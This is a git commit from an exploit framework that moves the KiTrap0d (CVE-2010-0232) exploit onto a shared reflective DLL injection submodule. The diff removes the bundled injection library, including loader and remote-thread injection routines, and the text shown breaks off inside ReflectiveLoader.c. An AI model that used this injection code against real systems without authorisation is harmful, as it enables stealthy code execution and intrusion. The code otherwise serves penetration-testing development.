Browse Source

Add RDI submodule, port Kitrap0d

This commit is the first in a series that will move all the exploits that use RDI
over to the R7 fork. The RDI source will be in a single known location and each
exploit will have to work from that location.

The kitrap0d exploit has been migrated over to use this submodule so that there's
one example of how it's done for future contributions to follow.
OJ 5 years ago
parent
commit
468654d2b5

+ 3
- 0
.gitmodules View File

@@ -0,0 +1,3 @@
1
+[submodule "external/source/ReflectiveDLLInjection"]
2
+	path = external/source/ReflectiveDLLInjection
3
+	url = https://github.com/rapid7/ReflectiveDLLInjection.git

+ 1
- 0
external/source/ReflectiveDLLInjection

@@ -0,0 +1 @@
1
+Subproject commit 88e8e5f109793f09b35cb17a621f33647d644103

BIN
external/source/ReflectiveDllInjection_v1.0.zip View File


+ 0
- 116
external/source/exploits/CVE-2010-0232/common/GetProcAddressR.c View File

@@ -1,116 +0,0 @@
1
-//===============================================================================================//
2
-// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
3
-// All rights reserved.
4
-// 
5
-// Redistribution and use in source and binary forms, with or without modification, are permitted 
6
-// provided that the following conditions are met:
7
-// 
8
-//     * Redistributions of source code must retain the above copyright notice, this list of 
9
-// conditions and the following disclaimer.
10
-// 
11
-//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
12
-// conditions and the following disclaimer in the documentation and/or other materials provided 
13
-// with the distribution.
14
-// 
15
-//     * Neither the name of Harmony Security nor the names of its contributors may be used to
16
-// endorse or promote products derived from this software without specific prior written permission.
17
-// 
18
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
19
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
20
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
21
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
22
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
23
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
24
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
25
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
26
-// POSSIBILITY OF SUCH DAMAGE.
27
-//===============================================================================================//
28
-#include "GetProcAddressR.h"
29
-//===============================================================================================//
30
-// We implement a minimal GetProcAddress to avoid using the native kernel32!GetProcAddress which
31
-// wont be able to resolve exported addresses in reflectivly loaded librarys.
32
-FARPROC WINAPI GetProcAddressR( HANDLE hModule, LPCSTR lpProcName )
33
-{
34
-	UINT_PTR uiLibraryAddress = 0;
35
-	FARPROC fpResult          = NULL;
36
-
37
-	if( hModule == NULL )
38
-		return NULL;
39
-
40
-	// a module handle is really its base address
41
-	uiLibraryAddress = (UINT_PTR)hModule;
42
-
43
-	__try
44
-	{
45
-		UINT_PTR uiAddressArray = 0;
46
-		UINT_PTR uiNameArray    = 0;
47
-		UINT_PTR uiNameOrdinals = 0;
48
-		PIMAGE_NT_HEADERS pNtHeaders             = NULL;
49
-		PIMAGE_DATA_DIRECTORY pDataDirectory     = NULL;
50
-		PIMAGE_EXPORT_DIRECTORY pExportDirectory = NULL;
51
-			
52
-		// get the VA of the modules NT Header
53
-		pNtHeaders = (PIMAGE_NT_HEADERS)(uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew);
54
-
55
-		pDataDirectory = (PIMAGE_DATA_DIRECTORY)&pNtHeaders->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
56
-
57
-		// get the VA of the export directory
58
-		pExportDirectory = (PIMAGE_EXPORT_DIRECTORY)( uiLibraryAddress + pDataDirectory->VirtualAddress );
59
-			
60
-		// get the VA for the array of addresses
61
-		uiAddressArray = ( uiLibraryAddress + pExportDirectory->AddressOfFunctions );
62
-
63
-		// get the VA for the array of name pointers
64
-		uiNameArray = ( uiLibraryAddress + pExportDirectory->AddressOfNames );
65
-				
66
-		// get the VA for the array of name ordinals
67
-		uiNameOrdinals = ( uiLibraryAddress + pExportDirectory->AddressOfNameOrdinals );
68
-
69
-		// test if we are importing by name or by ordinal...
70
-		if( ((DWORD)lpProcName & 0xFFFF0000 ) == 0x00000000 )
71
-		{
72
-			// import by ordinal...
73
-
74
-			// use the import ordinal (- export ordinal base) as an index into the array of addresses
75
-			uiAddressArray += ( ( IMAGE_ORDINAL( (DWORD)lpProcName ) - pExportDirectory->Base ) * sizeof(DWORD) );
76
-
77
-			// resolve the address for this imported function
78
-			fpResult = (FARPROC)( uiLibraryAddress + DEREF_32(uiAddressArray) );
79
-		}
80
-		else
81
-		{
82
-			// import by name...
83
-			DWORD dwCounter = pExportDirectory->NumberOfNames;
84
-			while( dwCounter-- )
85
-			{
86
-				char * cpExportedFunctionName = (char *)(uiLibraryAddress + DEREF_32( uiNameArray ));
87
-				
88
-				// test if we have a match...
89
-				if( strcmp( cpExportedFunctionName, lpProcName ) == 0 )
90
-				{
91
-					// use the functions name ordinal as an index into the array of name pointers
92
-					uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
93
-					
94
-					// calculate the virtual address for the function
95
-					fpResult = (FARPROC)(uiLibraryAddress + DEREF_32( uiAddressArray ));
96
-					
97
-					// finish...
98
-					break;
99
-				}
100
-						
101
-				// get the next exported function name
102
-				uiNameArray += sizeof(DWORD);
103
-
104
-				// get the next exported function name ordinal
105
-				uiNameOrdinals += sizeof(WORD);
106
-			}
107
-		}
108
-	}
109
-	__except( EXCEPTION_EXECUTE_HANDLER )
110
-	{
111
-		fpResult = NULL;
112
-	}
113
-
114
-	return fpResult;
115
-}
116
-//===============================================================================================//

+ 0
- 36
external/source/exploits/CVE-2010-0232/common/GetProcAddressR.h View File

@@ -1,36 +0,0 @@
1
-//===============================================================================================//
2
-// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
3
-// All rights reserved.
4
-// 
5
-// Redistribution and use in source and binary forms, with or without modification, are permitted 
6
-// provided that the following conditions are met:
7
-// 
8
-//     * Redistributions of source code must retain the above copyright notice, this list of 
9
-// conditions and the following disclaimer.
10
-// 
11
-//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
12
-// conditions and the following disclaimer in the documentation and/or other materials provided 
13
-// with the distribution.
14
-// 
15
-//     * Neither the name of Harmony Security nor the names of its contributors may be used to
16
-// endorse or promote products derived from this software without specific prior written permission.
17
-// 
18
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
19
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
20
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
21
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
22
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
23
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
24
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
25
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
26
-// POSSIBILITY OF SUCH DAMAGE.
27
-//===============================================================================================//
28
-#ifndef _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_GETPROCADDRESSR_H
29
-#define _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_GETPROCADDRESSR_H
30
-//===============================================================================================//
31
-#include "ReflectiveDLLInjection.h"
32
-
33
-FARPROC WINAPI GetProcAddressR( HANDLE hModule, LPCSTR lpProcName );
34
-//===============================================================================================//
35
-#endif
36
-//===============================================================================================//

+ 0
- 233
external/source/exploits/CVE-2010-0232/common/LoadLibraryR.c View File

@@ -1,233 +0,0 @@
1
-//===============================================================================================//
2
-// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
3
-// All rights reserved.
4
-// 
5
-// Redistribution and use in source and binary forms, with or without modification, are permitted 
6
-// provided that the following conditions are met:
7
-// 
8
-//     * Redistributions of source code must retain the above copyright notice, this list of 
9
-// conditions and the following disclaimer.
10
-// 
11
-//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
12
-// conditions and the following disclaimer in the documentation and/or other materials provided 
13
-// with the distribution.
14
-// 
15
-//     * Neither the name of Harmony Security nor the names of its contributors may be used to
16
-// endorse or promote products derived from this software without specific prior written permission.
17
-// 
18
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
19
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
20
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
21
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
22
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
23
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
24
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
25
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
26
-// POSSIBILITY OF SUCH DAMAGE.
27
-//===============================================================================================//
28
-#include "LoadLibraryR.h"
29
-//===============================================================================================//
30
-DWORD Rva2Offset( DWORD dwRva, UINT_PTR uiBaseAddress )
31
-{    
32
-	WORD wIndex                          = 0;
33
-	PIMAGE_SECTION_HEADER pSectionHeader = NULL;
34
-	PIMAGE_NT_HEADERS pNtHeaders         = NULL;
35
-	
36
-	pNtHeaders = (PIMAGE_NT_HEADERS)(uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew);
37
-
38
-	pSectionHeader = (PIMAGE_SECTION_HEADER)((UINT_PTR)(&pNtHeaders->OptionalHeader) + pNtHeaders->FileHeader.SizeOfOptionalHeader);
39
-
40
-    if( dwRva < pSectionHeader[0].PointerToRawData )
41
-        return dwRva;
42
-
43
-    for( wIndex=0 ; wIndex < pNtHeaders->FileHeader.NumberOfSections ; wIndex++ )
44
-    {   
45
-        if( dwRva >= pSectionHeader[wIndex].VirtualAddress && dwRva < (pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].SizeOfRawData) )           
46
-           return ( dwRva - pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].PointerToRawData );
47
-    }
48
-    
49
-    return 0;
50
-}
51
-//===============================================================================================//
52
-DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer )
53
-{
54
-	UINT_PTR uiBaseAddress   = 0;
55
-	UINT_PTR uiExportDir     = 0;
56
-	UINT_PTR uiNameArray     = 0;
57
-	UINT_PTR uiAddressArray  = 0;
58
-	UINT_PTR uiNameOrdinals  = 0;
59
-	DWORD dwCounter          = 0;
60
-#ifdef _WIN64
61
-	DWORD dwMeterpreterArch = 2;
62
-#else
63
-	// This will catch Win32 and WinRT.
64
-	DWORD dwMeterpreterArch = 1;
65
-#endif
66
-
67
-	uiBaseAddress = (UINT_PTR)lpReflectiveDllBuffer;
68
-
69
-	// get the File Offset of the modules NT Header
70
-	uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
71
-
72
-	// currenlty we can only process a PE file which is the same type as the one this fuction has  
73
-	// been compiled as, due to various offset in the PE structures being defined at compile time.
74
-	if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x010B ) // PE32
75
-	{
76
-		if( dwMeterpreterArch != 1 )
77
-			return 0;
78
-	}
79
-	else if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x020B ) // PE64
80
-	{
81
-		if( dwMeterpreterArch != 2 )
82
-			return 0;
83
-	}
84
-	else
85
-	{
86
-		return 0;
87
-	}
88
-
89
-	// uiNameArray = the address of the modules export directory entry
90
-	uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
91
-
92
-	// get the File Offset of the export directory
93
-	uiExportDir = uiBaseAddress + Rva2Offset( ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress, uiBaseAddress );
94
-
95
-	// get the File Offset for the array of name pointers
96
-	uiNameArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames, uiBaseAddress );
97
-
98
-	// get the File Offset for the array of addresses
99
-	uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress );
100
-
101
-	// get the File Offset for the array of name ordinals
102
-	uiNameOrdinals = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals, uiBaseAddress );	
103
-
104
-	// get a counter for the number of exported functions...
105
-	dwCounter = ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->NumberOfNames;
106
-
107
-	// loop through all the exported functions to find the ReflectiveLoader
108
-	while( dwCounter-- )
109
-	{
110
-		char * cpExportedFunctionName = (char *)(uiBaseAddress + Rva2Offset( DEREF_32( uiNameArray ), uiBaseAddress ));
111
-
112
-		if( strstr( cpExportedFunctionName, "ReflectiveLoader" ) != NULL )
113
-		{
114
-			// get the File Offset for the array of addresses
115
-			uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress );	
116
-	
117
-			// use the functions name ordinal as an index into the array of name pointers
118
-			uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
119
-
120
-			// return the File Offset to the ReflectiveLoader() functions code...
121
-			return Rva2Offset( DEREF_32( uiAddressArray ), uiBaseAddress );
122
-		}
123
-		// get the next exported function name
124
-		uiNameArray += sizeof(DWORD);
125
-
126
-		// get the next exported function name ordinal
127
-		uiNameOrdinals += sizeof(WORD);
128
-	}
129
-
130
-	return 0;
131
-}
132
-//===============================================================================================//
133
-// Loads a DLL image from memory via its exported ReflectiveLoader function
134
-HMODULE WINAPI LoadLibraryR( LPVOID lpBuffer, DWORD dwLength )
135
-{
136
-	HMODULE hResult                    = NULL;
137
-	DWORD dwReflectiveLoaderOffset     = 0;
138
-	DWORD dwOldProtect1                = 0;
139
-	DWORD dwOldProtect2                = 0;
140
-	REFLECTIVELOADER pReflectiveLoader = NULL;
141
-	DLLMAIN pDllMain                   = NULL;
142
-
143
-	if( lpBuffer == NULL || dwLength == 0 )
144
-		return NULL;
145
-
146
-	__try
147
-	{
148
-		// check if the library has a ReflectiveLoader...
149
-		dwReflectiveLoaderOffset = GetReflectiveLoaderOffset( lpBuffer );
150
-		if( dwReflectiveLoaderOffset != 0 )
151
-		{
152
-			pReflectiveLoader = (REFLECTIVELOADER)((UINT_PTR)lpBuffer + dwReflectiveLoaderOffset);
153
-
154
-			// we must VirtualProtect the buffer to RWX so we can execute the ReflectiveLoader...
155
-			// this assumes lpBuffer is the base address of the region of pages and dwLength the size of the region
156
-			if( VirtualProtect( lpBuffer, dwLength, PAGE_EXECUTE_READWRITE, &dwOldProtect1 ) )
157
-			{
158
-				// call the librarys ReflectiveLoader...
159
-				pDllMain = (DLLMAIN)pReflectiveLoader();
160
-				if( pDllMain != NULL )
161
-				{
162
-					// call the loaded librarys DllMain to get its HMODULE
163
-					// Dont call DLL_METASPLOIT_ATTACH/DLL_METASPLOIT_DETACH as that is for payloads only.
164
-					if( !pDllMain( NULL, DLL_QUERY_HMODULE, &hResult ) )	
165
-						hResult = NULL;
166
-				}
167
-				// revert to the previous protection flags...
168
-				VirtualProtect( lpBuffer, dwLength, dwOldProtect1, &dwOldProtect2 );
169
-			}
170
-		}
171
-	}
172
-	__except( EXCEPTION_EXECUTE_HANDLER )
173
-	{
174
-		hResult = NULL;
175
-	}
176
-
177
-	return hResult;
178
-}
179
-//===============================================================================================//
180
-// Loads a PE image from memory into the address space of a host process via the image's exported ReflectiveLoader function
181
-// Note: You must compile whatever you are injecting with REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR 
182
-//       defined in order to use the correct RDI prototypes.
183
-// Note: The hProcess handle must have these access rights: PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | 
184
-//       PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ
185
-// Note: If you are passing in an lpParameter value, if it is a pointer, remember it is for a different address space.
186
-// Note: This function currently cant inject accross architectures, but only to architectures which are the 
187
-//       same as the arch this function is compiled as, e.g. x86->x86 and x64->x64 but not x64->x86 or x86->x64.
188
-HANDLE WINAPI LoadRemoteLibraryR( HANDLE hProcess, LPVOID lpBuffer, DWORD dwLength, LPVOID lpParameter )
189
-{
190
-	LPVOID lpRemoteLibraryBuffer              = NULL;
191
-	LPTHREAD_START_ROUTINE lpReflectiveLoader = NULL;
192
-	HANDLE hThread                            = NULL;
193
-	DWORD dwReflectiveLoaderOffset            = 0;
194
-	DWORD dwThreadId                          = 0;
195
-
196
-	__try
197
-	{
198
-		do
199
-		{
200
-			if( !hProcess  || !lpBuffer || !dwLength )
201
-				break;
202
-
203
-			// check if the library has a ReflectiveLoader...
204
-			dwReflectiveLoaderOffset = GetReflectiveLoaderOffset( lpBuffer );
205
-			if( !dwReflectiveLoaderOffset )
206
-				break;
207
-
208
-			// alloc memory (RWX) in the host process for the image...
209
-			lpRemoteLibraryBuffer = VirtualAllocEx( hProcess, NULL, dwLength, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE ); 
210
-			if( !lpRemoteLibraryBuffer )
211
-				break;
212
-
213
-			// write the image into the host process...
214
-			if( !WriteProcessMemory( hProcess, lpRemoteLibraryBuffer, lpBuffer, dwLength, NULL ) )
215
-				break;
216
-
217
-			// add the offset to ReflectiveLoader() to the remote library address...
218
-			lpReflectiveLoader = (LPTHREAD_START_ROUTINE)( (ULONG_PTR)lpRemoteLibraryBuffer + dwReflectiveLoaderOffset );
219
-
220
-			// create a remote thread in the host process to call the ReflectiveLoader!
221
-			hThread = CreateRemoteThread( hProcess, NULL, 1024*1024, lpReflectiveLoader, lpParameter, (DWORD)NULL, &dwThreadId );
222
-
223
-		} while( 0 );
224
-
225
-	}
226
-	__except( EXCEPTION_EXECUTE_HANDLER )
227
-	{
228
-		hThread = NULL;
229
-	}
230
-
231
-	return hThread;
232
-}
233
-//===============================================================================================//

+ 0
- 41
external/source/exploits/CVE-2010-0232/common/LoadLibraryR.h View File

@@ -1,41 +0,0 @@
1
-//===============================================================================================//
2
-// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
3
-// All rights reserved.
4
-// 
5
-// Redistribution and use in source and binary forms, with or without modification, are permitted 
6
-// provided that the following conditions are met:
7
-// 
8
-//     * Redistributions of source code must retain the above copyright notice, this list of 
9
-// conditions and the following disclaimer.
10
-// 
11
-//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
12
-// conditions and the following disclaimer in the documentation and/or other materials provided 
13
-// with the distribution.
14
-// 
15
-//     * Neither the name of Harmony Security nor the names of its contributors may be used to
16
-// endorse or promote products derived from this software without specific prior written permission.
17
-// 
18
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
19
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
20
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
21
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
22
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
23
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
24
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
25
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
26
-// POSSIBILITY OF SUCH DAMAGE.
27
-//===============================================================================================//
28
-#ifndef _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_LOADLIBRARYR_H
29
-#define _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_LOADLIBRARYR_H
30
-//===============================================================================================//
31
-#include "ReflectiveDLLInjection.h"
32
-
33
-DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer );
34
-
35
-HMODULE WINAPI LoadLibraryR( LPVOID lpBuffer, DWORD dwLength );
36
-
37
-HANDLE WINAPI LoadRemoteLibraryR( HANDLE hProcess, LPVOID lpBuffer, DWORD dwLength, LPVOID lpParameter );
38
-
39
-//===============================================================================================//
40
-#endif
41
-//===============================================================================================//

+ 0
- 53
external/source/exploits/CVE-2010-0232/common/ReflectiveDLLInjection.h View File

@@ -1,53 +0,0 @@
1
-//===============================================================================================//
2
-// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
3
-// All rights reserved.
4
-// 
5
-// Redistribution and use in source and binary forms, with or without modification, are permitted 
6
-// provided that the following conditions are met:
7
-// 
8
-//     * Redistributions of source code must retain the above copyright notice, this list of 
9
-// conditions and the following disclaimer.
10
-// 
11
-//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
12
-// conditions and the following disclaimer in the documentation and/or other materials provided 
13
-// with the distribution.
14
-// 
15
-//     * Neither the name of Harmony Security nor the names of its contributors may be used to
16
-// endorse or promote products derived from this software without specific prior written permission.
17
-// 
18
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
19
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
20
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
21
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
22
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
23
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
24
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
25
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
26
-// POSSIBILITY OF SUCH DAMAGE.
27
-//===============================================================================================//
28
-#ifndef _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
29
-#define _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
30
-//===============================================================================================//
31
-#define WIN32_LEAN_AND_MEAN
32
-#include <windows.h>
33
-
34
-// we declare some common stuff in here...
35
-
36
-#define DLL_METASPLOIT_ATTACH	4
37
-#define DLL_METASPLOIT_DETACH	5
38
-#define DLL_QUERY_HMODULE		6
39
-
40
-#define DEREF( name )*(UINT_PTR *)(name)
41
-#define DEREF_64( name )*(DWORD64 *)(name)
42
-#define DEREF_32( name )*(DWORD *)(name)
43
-#define DEREF_16( name )*(WORD *)(name)
44
-#define DEREF_8( name )*(BYTE *)(name)
45
-
46
-typedef UINT_PTR (WINAPI * REFLECTIVELOADER)( VOID );
47
-typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID );
48
-
49
-#define DLLEXPORT   __declspec( dllexport ) 
50
-
51
-//===============================================================================================//
52
-#endif
53
-//===============================================================================================//

+ 0
- 599
external/source/exploits/CVE-2010-0232/common/ReflectiveLoader.c View File

@@ -1,599 +0,0 @@
1
-//===============================================================================================//
2
-// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
3
-// All rights reserved.
4
-// 
5
-// Redistribution and use in source and binary forms, with or without modification, are permitted 
6
-// provided that the following conditions are met:
7
-// 
8
-//     * Redistributions of source code must retain the above copyright notice, this list of 
9
-// conditions and the following disclaimer.
10
-// 
11
-//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
12
-// conditions and the following disclaimer in the documentation and/or other materials provided 
13
-// with the distribution.
14
-// 
15
-//     * Neither the name of Harmony Security nor the names of its contributors may be used to
16
-// endorse or promote products derived from this software without specific prior written permission.
17
-// 
18
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
19
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
20
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
21
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
22
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
23
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
24
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
25
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
26
-// POSSIBILITY OF SUCH DAMAGE.
27
-//===============================================================================================//
28
-#include "ReflectiveLoader.h"
29
-//===============================================================================================//
30
-// Our loader will set this to a pseudo correct HINSTANCE/HMODULE value
31
-HINSTANCE hAppInstance = NULL;
32
-//===============================================================================================//
33
-#pragma intrinsic( _ReturnAddress )
34
-// This function can not be inlined by the compiler or we will not get the address we expect. Ideally 
35
-// this code will be compiled with the /O2 and /Ob1 switches. Bonus points if we could take advantage of 
36
-// RIP relative addressing in this instance but I dont believe we can do so with the compiler intrinsics 
37
-// available (and no inline asm available under x64).
38
-__declspec(noinline) ULONG_PTR caller( VOID ) { return (ULONG_PTR)_ReturnAddress(); }
39
-//===============================================================================================//
40
-
41
-#ifdef ENABLE_OUTPUTDEBUGSTRING
42
-#define OUTPUTDBG(str) pOutputDebug((LPCSTR)str)
43
-#else /* ENABLE_OUTPUTDEBUGSTRING */
44
-#define OUTPUTDBG(str) do{}while(0)
45
-#endif
46
-
47
-// Note 1: If you want to have your own DllMain, define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN,  
48
-//         otherwise the DllMain at the end of this file will be used.
49
-
50
-// Note 2: If you are injecting the DLL via LoadRemoteLibraryR, define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR,
51
-//         otherwise it is assumed you are calling the ReflectiveLoader via a stub.
52
-
53
-// This is our position independent reflective DLL loader/injector
54
-#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
55
-DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader( LPVOID lpParameter )
56
-#else
57
-DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader( VOID )
58
-#endif
59
-{
60
-	// the functions we need
61
-	LOADLIBRARYA pLoadLibraryA     = NULL;
62
-	GETPROCADDRESS pGetProcAddress = NULL;
63
-	VIRTUALALLOC pVirtualAlloc     = NULL;
64
-	NTFLUSHINSTRUCTIONCACHE pNtFlushInstructionCache = NULL;
65
-#ifdef ENABLE_STOPPAGING
66
-	VIRTUALLOCK pVirtualLock	   = NULL;
67
-#endif
68
-#ifdef ENABLE_OUTPUTDEBUGSTRING
69
-	OUTPUTDEBUG pOutputDebug       = NULL;
70
-#endif
71
-
72
-	USHORT usCounter;
73
-
74
-	// the initial location of this image in memory
75
-	ULONG_PTR uiLibraryAddress;
76
-	// the kernels base address and later this images newly loaded base address
77
-	ULONG_PTR uiBaseAddress;
78
-
79
-	// variables for processing the kernels export table
80
-	ULONG_PTR uiAddressArray;
81
-	ULONG_PTR uiNameArray;
82
-	ULONG_PTR uiExportDir;
83
-	ULONG_PTR uiNameOrdinals;
84
